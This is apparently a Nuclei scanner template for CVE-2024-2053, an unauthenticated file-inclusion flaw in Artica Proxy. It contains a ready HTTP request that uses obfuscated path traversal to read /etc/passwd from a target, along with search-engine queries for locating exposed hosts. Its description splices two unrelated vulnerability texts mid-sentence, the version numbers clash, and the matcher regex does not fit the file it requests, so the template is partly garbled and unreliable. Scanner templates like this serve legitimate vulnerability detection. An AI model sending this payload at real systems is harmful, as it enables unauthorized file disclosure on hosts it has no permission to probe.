info: name: Artica Proxy - Unauthenticated LFI author: pussycat0x severity: high description: | The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. This issue was demonstrated on version 4.50 of the The Artica-Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the "www-data" user. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score:7.5 cve-id: CVE-2024-2053 cwe-id: CWE-23 epss-score:0.00434 epss-percentile:0.61897 cpe: cpe:2.3:a:articatech:artica_proxy:4.40:*:*:*:*:*:*:* metadata: vendor: articatech product: artica_proxy shodan-query: http.html:"artica" fofa-query: body="artica" tags: cve,cve2024,lfi,artica,proxyfile-disclosure
http: -raw: - | GET /images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: -type: regex part: body regex: -"uid=[0-9]+.*gid=[0-9]+.*"